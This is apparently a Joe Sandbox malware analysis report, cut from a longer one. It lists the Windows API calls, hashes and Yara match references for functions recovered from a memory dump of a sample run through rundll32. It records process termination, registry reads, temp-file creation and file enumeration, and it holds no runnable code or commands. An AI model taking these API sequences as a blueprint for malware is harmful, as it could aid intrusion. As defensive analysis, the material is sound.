                            • Opcode Fuzzy Hash: 77a4583ba288050ecb58276a62ce04f2353f2bb31379f9791021c4710bab86f4
                            • Instruction Fuzzy Hash: 7E11C273E0062977AB22BBB8AC88C6E37ADDE85658305005BF9059B140DF7CED0397E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F69E82 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                            Download Yara Rule
                            APIs
                            • SwitchToThread.KERNEL32(?,?,04F7E846), ref: 04F69EAD
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F69EB9
                            • CloseHandle.KERNEL32(00000000,7620F720,?,04F63576,00000000,?,?,?,04F7E846), ref: 04F69ECB
                            • memset.NTDLL ref: 04F69EE2
                            • memset.NTDLL ref: 04F69EF9
                            • memset.NTDLL ref: 04F69F10
                            • memset.NTDLL ref: 04F69F27
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$CloseHandle$SwitchThread
                            • String ID:
                            • API String ID: 3699883640-0
                            • Opcode ID: 4e71228fef517c4085a33fa61a6e88711b912bcc9926d7396a1c3a3e1601cd7e
                            • Instruction ID: de207b77b0e9cfeae40d51c0819debf26effb39726c4aa80f188cae57ecdac19
                            • Opcode Fuzzy Hash: 4e71228fef517c4085a33fa61a6e88711b912bcc9926d7396a1c3a3e1601cd7e
                            • Instruction Fuzzy Hash: 6A11A371E4153877E2323725FC09D6B7AAEEFD5B14B08001FF005AA100DB6E7D0386A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6CA7A Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6CAAB
                            • wcstombs.NTDLL ref: 04F6CABC
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04F6CADD
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04F6CAEC
                            • CloseHandle.KERNEL32(00000000), ref: 04F6CAF3
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F6CB02
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F6CB12
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                            • String ID:
                            • API String ID: 417118235-0
                            • Opcode ID: 6ce062befe7a8a2b4014f078460ef62884a422b17bb392851e5ddf07864e8900
                            • Instruction ID: 9ccc41a477185e532d6bae9bdf091a5561b4ee5642113cf4db81c8a655e383d4
                            • Opcode Fuzzy Hash: 6ce062befe7a8a2b4014f078460ef62884a422b17bb392851e5ddf07864e8900
                            • Instruction Fuzzy Hash: 2011C131A0025AFBE7119F54EC48FBA7BA8FF04305F140018F986AA180C7B9ED55DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73193 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04F731CD
                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731DF
                            • GetTickCount.KERNEL32 ref: 04F731EA
                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731F6
                            • lstrcpy.KERNEL32(00000000), ref: 04F73210
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                            • String ID: \Low
                            • API String ID: 1629304206-4112222293
                            • Opcode ID: c1ab856e717cf3da2aaf37dee8dd761490f5a6182b6d88c43a2cbf180d6b7c4e
                            • Instruction ID: 3242558c721cef5ab5a99b10775eb6a5c44f89969f185b098dc4bfdec0fa7a46
                            • Opcode Fuzzy Hash: c1ab856e717cf3da2aaf37dee8dd761490f5a6182b6d88c43a2cbf180d6b7c4e
                            • Instruction Fuzzy Hash: 9901DE71A0162ABBD2116A75BC48FBF779CEF02691B15002AFA00DB180DB6CED02D7F4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F66F51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 04F66F64
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04F66F76
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F66FA0
                            • WaitForMultipleObjects.KERNEL32(00000002,04F72EB3,00000000,000000FF), ref: 04F66FB3
                            • CloseHandle.KERNEL32(04F72EB3), ref: 04F66FBC
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                            • String ID: 0x%08X
                            • API String ID: 603522830-3182613153
                            • Opcode ID: c59f38d456180a66a07a3c1596aa9b30db003f70e5c27a5bd7cf98798b611947
                            • Instruction ID: 8eb9f957ed9e61c5b33b17a93d1e9377bf97691b76b3daa0cabe0b78a2587a2e
                            • Opcode Fuzzy Hash: c59f38d456180a66a07a3c1596aa9b30db003f70e5c27a5bd7cf98798b611947
                            • Instruction Fuzzy Hash: A0011AB1901229BBDB10AF94EC49DEFBF7CEF05364F004118B916E6185E774AA01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7D30A Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetLastError.KERNEL32(?,?,?,00001000,?,04F8A2F4,7620F750), ref: 04F7D38B
                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,04F8A2F4,7620F750), ref: 04F7D410
                            • CloseHandle.KERNEL32(00000000,?,04F8A2F4,7620F750), ref: 04F7D42A
                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,04F8A2F4,7620F750), ref: 04F7D45F
                              • Part of subcall function 04F6D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,04F65546), ref: 04F6D6C0
                            • WaitForSingleObject.KERNEL32(?,00000064,?,04F8A2F4,7620F750), ref: 04F7D4E1
                            • CloseHandle.KERNEL32(F0FFC983,?,04F8A2F4,7620F750), ref: 04F7D508
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                            • String ID:
                            • API String ID: 3115907006-0
                            • Opcode ID: 0ebad5e54e29f63032a66b78a7758ba124938100301d4d0403d10e5d9a750635
                            • Instruction ID: d0ee1a6c126caa672a275ec282fe2295f7ecfb93965d8d03cecece0be2026999
                            • Opcode Fuzzy Hash: 0ebad5e54e29f63032a66b78a7758ba124938100301d4d0403d10e5d9a750635
                            • Instruction Fuzzy Hash: AD811871E00219EFDF11DF94C984AAEBBB5FF08304F64845AE905AB250D739BD52CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7B278 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • FileTimeToLocalFileTime.KERNEL32(00000000,04F72702), ref: 04F7B2DA
                            • FileTimeToSystemTime.KERNEL32(04F72702,?), ref: 04F7B2E8
                            • lstrlenW.KERNEL32(00000010), ref: 04F7B2F8
                            • lstrlenW.KERNEL32(00000218), ref: 04F7B304
                            • FileTimeToLocalFileTime.KERNEL32(00000008,04F72702), ref: 04F7B3F1
                            • FileTimeToSystemTime.KERNEL32(04F72702,?), ref: 04F7B3FF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                            • String ID:
                            • API String ID: 1122361434-0
                            • Opcode ID: 481146f6d4003bac30149c92c889e025df753d1dcb7736454c5ffb13e886ee10
                            • Instruction ID: 334a4b15d0f6028f6d12e88c78501a8efad40db27d9ede71071809fd8b7e1cd9
                            • Opcode Fuzzy Hash: 481146f6d4003bac30149c92c889e025df753d1dcb7736454c5ffb13e886ee10
                            • Instruction Fuzzy Hash: 7D71F071A0011AABCB50DFA9D884EEEB7FCEF09304F14445AE505E7241E738E946DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6E40F Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlImageNtHeader.NTDLL(?), ref: 04F6E428
                              • Part of subcall function 04F77A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04F6E448,?), ref: 04F77A6A
                              • Part of subcall function 04F77A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77A7C
                              • Part of subcall function 04F77A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77A99
                              • Part of subcall function 04F77A3E: lstrlenW.KERNEL32(00000000,?,?,04F6E448,?), ref: 04F77AA5
                              • Part of subcall function 04F77A3E: HeapFree.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77AB9
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F6E460
                            • CloseHandle.KERNEL32(?), ref: 04F6E46E
                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 04F6E547
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F6E556
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 04F6E569
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                            • String ID:
                            • API String ID: 1719504581-0
                            • Opcode ID: 8c363d25094100215a671fc5ab0582fd646d53d992abc3a921771ae6c07a59a0
                            • Instruction ID: de74f5916f21a39378a7f3cf7fd8ac5a7cfb72037b1c68f76b812db4859b12a8
                            • Opcode Fuzzy Hash: 8c363d25094100215a671fc5ab0582fd646d53d992abc3a921771ae6c07a59a0
                            • Instruction Fuzzy Hash: 6441443BA00609EBDB119FA4EC84FAA7B7AEF44704F144019E905EB251E734FE56DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7D1DC Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 04F7D237
                            • GetLastError.KERNEL32 ref: 04F7D25D
                            • SetEvent.KERNEL32(00000000), ref: 04F7D270
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F7D2B9
                            • memset.NTDLL ref: 04F7D2CE
                            • RtlExitUserThread.NTDLL(?), ref: 04F7D303
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                            • String ID:
                            • API String ID: 3978817377-0
                            • Opcode ID: 7eda063edbc2b79e084304ffc4d737274e85b42e4d8db50065bdefec64d4b1c1
                            • Instruction ID: 9162374df0f3856a6083ec8a1758e5c6f34102b54c00c4dee5d171bcdde47235
                            • Opcode Fuzzy Hash: 7eda063edbc2b79e084304ffc4d737274e85b42e4d8db50065bdefec64d4b1c1
                            • Instruction Fuzzy Hash: 7C4171B1900608AFDB209FA4EC88C7EB7BCFF853117A4451EE946D6100D779ED46CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74F40 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f14dc97abcf826b60e19857b020cefba5e266d7155df858d8c8ebe7af788354
                            • Instruction ID: 46e9a6c6d9d612004721624cf83e996250d0ce91bbb6116c07e15cb4aa7ec365
                            • Opcode Fuzzy Hash: 2f14dc97abcf826b60e19857b020cefba5e266d7155df858d8c8ebe7af788354
                            • Instruction Fuzzy Hash: 9541D4B1900715EFD720AF349C8892B77E8FB44724B104A2EF666CB580E778B842CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6EABA Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EB0D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04F6EB2E
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EB5A
                              • Part of subcall function 04F7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                              • Part of subcall function 04F7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BCB9
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04F6EB77
                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04F6EB98
                            • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EBAD
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                            • String ID:
                            • API String ID: 2670873185-0
                            • Opcode ID: 77a19e9ce2fea657fe291249ee3e3e1f7a827be35587350afc1e41bd164839de
                            • Instruction ID: 3177c01452bab4e3ef34d4febe1fb110c7a66a22e2b13260e9efc7994d6e3471
                            • Opcode Fuzzy Hash: 77a19e9ce2fea657fe291249ee3e3e1f7a827be35587350afc1e41bd164839de
                            • Instruction Fuzzy Hash: C7313076904205AFDB10AF64DC8486EBBEDFB88298F14092EF58697110D735ED06CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7EF9F Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005,?,00000000), ref: 04F7EFBB
                            • lstrlen.KERNEL32(00000000,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005), ref: 04F7EFD1
                            • lstrlen.KERNEL32(?,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005), ref: 04F7EFE6
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F7F04B
                            • _snprintf.NTDLL ref: 04F7F071
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 04F7F090
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFree_snprintf
                            • String ID:
                            • API String ID: 3180502281-0
                            • Opcode ID: 150b21a27abe2b804e78c33c7f02579d39a7287a2dbcf1f14b2d734822b9738a
                            • Instruction ID: 2a6b7978aa4de6db31a44489439edecd75a7d6690ecb8cfe46f91229cd1b3868
                            • Opcode Fuzzy Hash: 150b21a27abe2b804e78c33c7f02579d39a7287a2dbcf1f14b2d734822b9738a
                            • Instruction Fuzzy Hash: 39314B3690021DFFDF11DFA5EC848AF7BAAFB44354B01842BF904AB110D779AD569BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A976 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                            Download Yara Rule
                            APIs
                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                            • CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                            • GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                            • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                            • String ID:
                            • API String ID: 1835239314-0
                            • Opcode ID: 447791d18855209e6deb280ff1ccc65d0a47abb191cf81ef6b4aa0451d106254
                            • Instruction ID: 6ef183a4bfe0f2fe2c78dd4597080dfe691b7b4a8183a379fb26327c432fb906
                            • Opcode Fuzzy Hash: 447791d18855209e6deb280ff1ccc65d0a47abb191cf81ef6b4aa0451d106254
                            • Instruction Fuzzy Hash: 40314C71D00109FBCB21DF95DA88CAEBBB9EB86754B14941AF406F6100D334AE41DFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6F519 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,04F77C35,00000000,?,?,?), ref: 04F6F531
                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04F77C35,00000000,?,?,?), ref: 04F6F542
                              • Part of subcall function 04F61F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,04F73D4E,00000000,?,?,00000000,00000001), ref: 04F61F21
                              • Part of subcall function 04F61F0F: StrChrA.SHLWAPI(?,0000000D,?,04F73D4E,00000000,?,?,00000000,00000001), ref: 04F61F59
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F6F582
                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5AF
                            • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5BE
                            • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 33fe80c928ac82904451bb35bf5dc59564849f2ea42680e8dfd8e55fd2130591
                            • Instruction ID: e580c4806b148d2fbd5dd5b5278d07273b859ead348b0b2622ecd27bbfb98e6f
                            • Opcode Fuzzy Hash: 33fe80c928ac82904451bb35bf5dc59564849f2ea42680e8dfd8e55fd2130591
                            • Instruction Fuzzy Hash: 53218E72A00109BFDB119F94EC84FAABBEDEF04244F044156FA05DF151D674ED458BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F8049A Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                            Download Yara Rule
                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04F804D9
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F804EA
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04F80505
                            • GetLastError.KERNEL32 ref: 04F8051B
                            • HeapFree.KERNEL32(00000000,?), ref: 04F8052D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F80542
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                            • String ID:
                            • API String ID: 1822509305-0
                            • Opcode ID: b8d05ac7d171765bdcbff3c152d89d028bed92a6dd55590cee8004c85e09aa80
                            • Instruction ID: af9cb3e1c27a3f1860345045c54942cc3e9c7bd5f7dfc3034da4dfad2a31dfd6
                            • Opcode Fuzzy Hash: b8d05ac7d171765bdcbff3c152d89d028bed92a6dd55590cee8004c85e09aa80
                            • Instruction Fuzzy Hash: 00112C76901028BFDB226A95EC08CEF7F7DEF46290B110465F909A9110DA355A56EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C8EF Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04F7C917
                            • _strupr.NTDLL ref: 04F7C952
                            • lstrlen.KERNEL32(00000000), ref: 04F7C95A
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04F7C999
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04F7C9A0
                            • GetLastError.KERNEL32 ref: 04F7C9A8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                            • String ID:
                            • API String ID: 110452925-0
                            • Opcode ID: fdbb8d9585658d6bd9f2c5fdcd500f70f02f2afba5cc29f19a5dfc718dabb418
                            • Instruction ID: 6ca06b83429be9fe9d45d39f8a863342ed0c192d0b6cab83a1466f4966375654
                            • Opcode Fuzzy Hash: fdbb8d9585658d6bd9f2c5fdcd500f70f02f2afba5cc29f19a5dfc718dabb418
                            • Instruction Fuzzy Hash: 1611E772A00249FFDB506F70EC88DBE7BBDEB88750B10141AF906DA041EA7CEC418B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7B549 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,7620F710), ref: 04F7B567
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04F7B595
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7B5A7
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04F7B5CC
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7B5E7
                            • RegCloseKey.ADVAPI32(?), ref: 04F7B5F1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                            • String ID:
                            • API String ID: 170146033-0
                            • Opcode ID: d59aed4b7b0ad35c6a5b33b8f8599167dba091afba8d90723f6e3c998515a668
                            • Instruction ID: a478f201213b4d1030fca5efa1ba4dda176bf808ca3172c68345e80508870a96
